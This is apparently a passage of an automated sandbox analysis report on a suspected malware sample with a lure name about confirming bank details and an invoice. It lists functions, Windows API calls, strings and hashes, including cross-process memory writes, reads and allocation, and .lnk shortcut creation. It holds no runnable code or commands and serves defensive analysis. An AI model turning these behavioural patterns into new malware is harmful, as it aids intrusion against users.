                    • Opcode ID: 7ee202abe0ffd52dedf1e6719d8231dcdc1f65eb1a531f0d039d7740dd4f3ca0
                    • Instruction ID: 84a9ce859d1698675f0d6cb65f5e1fa8235c8e3c4529a059377b0285a77efa1c
                    • Opcode Fuzzy Hash: 7ee202abe0ffd52dedf1e6719d8231dcdc1f65eb1a531f0d039d7740dd4f3ca0
                    • Instruction Fuzzy Hash: C401A430900704ABEB246B12DE4EBA677B9FF11715F00056AB593A54E1DBF8AA54CB48
                    Function 0048B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • EndPath.GDI32(?), ref: 0048B0BA
                    • StrokeAndFillPath.GDI32(?,?,004EE680,00000000,?,?,?), ref: 0048B0D6
                    • SelectObject.GDI32(?,00000000), ref: 0048B0E9
                    • DeleteObject.GDI32 ref: 0048B0FC
                    • StrokePath.GDI32(?), ref: 0048B117
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: 922704bb090f6ea521c2bf1d6758bcae89b763daa06c658334fb59417c3a6413
                    • Instruction ID: f2d7c2689d9083f214a8653dcad4fdc8ff5c10461c40331952b61483e2e4edde
                    • Opcode Fuzzy Hash: 922704bb090f6ea521c2bf1d6758bcae89b763daa06c658334fb59417c3a6413
                    • Instruction Fuzzy Hash: FBF01D30000A44DFC721AFA5ED0E7693B65E7213A5F088315E425496F1C7344569EF6C
                    Function 004BF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 004BF2DA
                    • CoCreateInstance.OLE32(004FDA7C,00000000,00000001,004FD8EC,?), ref: 004BF2F2
                    • CoUninitialize.OLE32 ref: 004BF555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize
                    • String ID: .lnk
                    • API String ID: 948891078-24824748
                    • Opcode ID: ef0504387e3cf65278a8766d0caf2bf208c1fbde11a440e28e01c749f8a21287
                    • Instruction ID: f04e0add8bcc34273d602df6659231601f22a3eed69fc5e9d7a08e37be0a4aad
                    • Opcode Fuzzy Hash: ef0504387e3cf65278a8766d0caf2bf208c1fbde11a440e28e01c749f8a21287
                    • Instruction Fuzzy Hash: 07A12D71104201AFD300EF55C881EAFB7E8EF99718F00895EF55997192DB74E909CBA6
                    Function 004BE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0047660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004753B1,?,?,004761FF,?,00000000,00000001,00000000), ref: 0047662F
                    • CoInitialize.OLE32(00000000), ref: 004BE85D
                    • CoCreateInstance.OLE32(004FDA7C,00000000,00000001,004FD8EC,?), ref: 004BE876
                    • CoUninitialize.OLE32 ref: 004BE893
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                    • String ID: .lnk
                    • API String ID: 2126378814-24824748
                    • Opcode ID: 678baafbc39fdde2d4f47466af570f5a60002b8651936a61762d8e664a351d94
                    • Instruction ID: e6e4496db859759274a72188f68fe4154207419ed82dd8d511e0fd0fcf2d4272
                    • Opcode Fuzzy Hash: 678baafbc39fdde2d4f47466af570f5a60002b8651936a61762d8e664a351d94
                    • Instruction Fuzzy Hash: 14A153756043019FCB10EF15C4849AABBE5BF88314F04899EF99A9B3A1CB35EC45CB95
                    Function 0049325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 004932ED
                      • Part of subcall function 0049E0D0: __87except.LIBCMT ref: 0049E10B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 9d56c567533075426f2b0b3bbaf4056728995614e97dbf77174ef70415ca9cad
                    • Instruction ID: 3e3f0d5e32413cd7c6b90608f76f556724a2a4cf4b1b0ccb68eaa839fc41f331
                    • Opcode Fuzzy Hash: 9d56c567533075426f2b0b3bbaf4056728995614e97dbf77174ef70415ca9cad
                    • Instruction Fuzzy Hash: 39513A21A0820196CF21EF16C90537F2F949B52715F208DBBF895823E9DF3D8DC9A64E
                    Function 004B4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0050DC50,?,0000000F,0000000C,00000016,0050DC50,?), ref: 004B4645
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004B46C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharUpper$__itow__swprintf
                    • String ID: REMOVE$THIS
                    • API String ID: 3797816924-776492005
                    • Opcode ID: ac210f47566b94eb9405867f78a73a32168c603a01c2e03842775f0dcfcd1977
                    • Instruction ID: 467ab6664603c4535305a14a5cb7e5a0e8d9201aa4e1d6ee4630aa9a92678677
                    • Opcode Fuzzy Hash: ac210f47566b94eb9405867f78a73a32168c603a01c2e03842775f0dcfcd1977
                    • Instruction Fuzzy Hash: EE417534A001199FCF01DF55C881AEEB7B5FF89308F14845AE91AAB392DB38DD45CB64
                    Function 004AC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004B430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004ABC08,?,?,00000034,00000800,?,00000034), ref: 004B4335
                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004AC1D3
                      • Part of subcall function 004B42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004ABC37,?,?,00000800,?,00001073,00000000,?,?), ref: 004B4300
                      • Part of subcall function 004B422F: GetWindowThreadProcessId.USER32(?,?), ref: 004B425A
                      • Part of subcall function 004B422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004ABBCC,00000034,?,?,00001004,00000000,00000000), ref: 004B426A
                      • Part of subcall function 004B422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004ABBCC,00000034,?,?,00001004,00000000,00000000), ref: 004B4280
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004AC240
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004AC28D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                    • String ID: @
                    • API String ID: 4150878124-2766056989
                    • Opcode ID: 3ccc7b3414c2cd9f4ba3dac065b24d28507126d6b8eb6c8c2e5ebd27da857c45
                    • Instruction ID: 4b71d4efc9532e4d7e4a37446c52017eef0535804a533d697befadef33f5b451
                    • Opcode Fuzzy Hash: 3ccc7b3414c2cd9f4ba3dac065b24d28507126d6b8eb6c8c2e5ebd27da857c45
                    • Instruction Fuzzy Hash: 86416972A00218AFDB10DFA4CD81BEEB7B8EF59300F00409AFA45B7281DA746E45DB64
                    Function 004DA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0050DC00,00000000,?,?,?,?), ref: 004DA6D8
                    • GetWindowLongW.USER32 ref: 004DA6F5
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004DA705
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: cce45f3f7d047d7794468069bb3ea50551e1755c24e9504c09c399a07a3098d9
                    • Instruction ID: f1563bc1dcd5e075490042aa5068f5ad7c94a25439c8e4aa7b3f1ad25298a655
                    • Opcode Fuzzy Hash: cce45f3f7d047d7794468069bb3ea50551e1755c24e9504c09c399a07a3098d9
                    • Instruction Fuzzy Hash: 8631BF31500205ABDB119E74CC51BEB7BA9FF49324F18472AF875923E0C778E8609B59
                    Function 004C5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004C5190
                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004C51C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |$DL
                    • API String ID: 1413715105-3824535098
                    • Opcode ID: 83e8996b3185d313d714d416ea0311ab61970226e88dd8591ad028dd1cb99400
                    • Instruction ID: cdd32d936f173fb321d329b9ed23e53a9e1db4055e3dd3e71f5dcb915e583949
                    • Opcode Fuzzy Hash: 83e8996b3185d313d714d416ea0311ab61970226e88dd8591ad028dd1cb99400
                    • Instruction Fuzzy Hash: 4B313971C00109ABCF01AFA5CC85EEE7FB9FF18704F00405AF809A6166DB35AA46DBA4
                    Function 004DA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004DA15E
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004DA172
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 004DA196
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 4df4975a3fca1febfdd93fdaf3423fc233dff85be2d2eb93c20a9f1e43e3ae90
                    • Instruction ID: 5dc29bb38fff5205c0a8b1a3a952005783f9ed7b62fcad7a0d5cf28bae4e562a
                    • Opcode Fuzzy Hash: 4df4975a3fca1febfdd93fdaf3423fc233dff85be2d2eb93c20a9f1e43e3ae90
                    • Instruction Fuzzy Hash: 0F21D332500218ABDF119F94CC42FEE3B79FF48714F100216FA55AB2D0D6B9AC61CB94
                    Function 004DA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004DA941
                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004DA94F
                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004DA956
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$DestroyWindow
                    • String ID: msctls_updown32
                    • API String ID: 4014797782-2298589950
                    • Opcode ID: 17005dfa19e8c1326f91455ac1e9f147e492b821daf119e80f2d58df9bb620e5
                    • Instruction ID: 1f437c51217a08fe71c82cea96e4e40e7382ba96db1b9321be1edf3fbe7fea69
                    • Opcode Fuzzy Hash: 17005dfa19e8c1326f91455ac1e9f147e492b821daf119e80f2d58df9bb620e5
                    • Instruction Fuzzy Hash: A921C4B5600209AFDB00DF65CCA2D773BADEF5A368B04045AFA049B361CB34EC21DB65
                    Function 004D99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004D9A30
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004D9A40
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004D9A65
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 2ab1533759960ed613e8ef7d9c8d349f4f6bdbfa26c242ab8f7db7f5ba6302e1
                    • Instruction ID: 247ff7899927eebc7b18cc727f439f17dc6df94383300140de1211cd5d193fbc
                    • Opcode Fuzzy Hash: 2ab1533759960ed613e8ef7d9c8d349f4f6bdbfa26c242ab8f7db7f5ba6302e1
                    • Instruction Fuzzy Hash: 4521C272610118BFEB218F54DC95FBF3BAAEF89754F01812AF9449B3A0C6759C11C7A4
                    Function 004DA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004DA46D
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004DA482
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004DA48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: ca35617e17e0dcdabb2bcb167d431a9818626c59ba1027fc43c57e6863e84ac3
                    • Instruction ID: a7f599593d143e76b15a4b9eec43fe7ab71a8acf8d6f1f4d37123b90c41bbae2
                    • Opcode Fuzzy Hash: ca35617e17e0dcdabb2bcb167d431a9818626c59ba1027fc43c57e6863e84ac3
                    • Instruction Fuzzy Hash: EB110A71200208BEEF209F75CC49FAB3B69FF89758F01411EFA45962D1D6B5E821DB28
                    Function 00492287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00492350,?), ref: 004922A1
                    • GetProcAddress.KERNEL32(00000000), ref: 004922A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 2574300362-340411864
                    • Opcode ID: 725fe037b2f92161cdaaa14c82a319462418845c125ca150113f168f86d503b9
                    • Instruction ID: ed9b72d3a785025b67b18d4981f1440efaf1e7f1139db1e913aca42379df166d
                    • Opcode Fuzzy Hash: 725fe037b2f92161cdaaa14c82a319462418845c125ca150113f168f86d503b9
                    • Instruction Fuzzy Hash: DFE01A70E94300ABDF205FB0ED4DB253A66AB21702F1050A1B202D52E0DBF84059EF0C
                    Function 0049235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00492276), ref: 00492376
                    • GetProcAddress.KERNEL32(00000000), ref: 0049237D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 2574300362-2819208100
                    • Opcode ID: 76379f817a091c73e7b9169784295069dbf98553fbe5486ef3f54562fd8b4c08
                    • Instruction ID: b7d5d3cab4ff8105e0ba7a92c765058a7da2d7bf2ae6424a69423fc2d5f2272a
                    • Opcode Fuzzy Hash: 76379f817a091c73e7b9169784295069dbf98553fbe5486ef3f54562fd8b4c08
                    • Instruction Fuzzy Hash: DAE0B670944304ABDB706F60EE1DB253A76BB20702F111425F609D22F0DBB89428FA19
                    Function 004EAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LocalTime__swprintf
                    • String ID: %.3d$WIN_XPe
                    • API String ID: 2070861257-2409531811
                    • Opcode ID: 671c14aa3f7e025b5f97401cf55c14c7d7207e1c329e2ba04743d73a60685b20
                    • Instruction ID: 33339519de828dba82b0dd1bb312ad72f6699c3945422ac57e46d58f48e12870
                    • Opcode Fuzzy Hash: 671c14aa3f7e025b5f97401cf55c14c7d7207e1c329e2ba04743d73a60685b20
                    • Instruction Fuzzy Hash: CBE012B1C04659DBCB109792DD05DFA777CAB04742F2004D3F906A2050D63DABA6EB1B
                    Function 004D2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,004D21FB,?,004D23EF), ref: 004D2213
                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 004D2225
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetProcessId$kernel32.dll
                    • API String ID: 2574300362-399901964
                    • Opcode ID: e5658362f42c6fc2ff4354adb5f9fb795de7e7698d2a137bbcc0bd5e3b1af7a7
                    • Instruction ID: 6cf6938a0bb7c6fdeb8c455875c6480d3f29e15aa0fb4e4fdfcefd52f0da3287
                    • Opcode Fuzzy Hash: e5658362f42c6fc2ff4354adb5f9fb795de7e7698d2a137bbcc0bd5e3b1af7a7
                    • Instruction Fuzzy Hash: 53D0A7349007229FC7214F30FA086127AD9FF15310F00487BF895E2390E7B4D880DA54
                    Function 004742F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,004742EC,?,004742AA,?), ref: 00474304
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00474316
                    Strings
                    Memory Dump Source
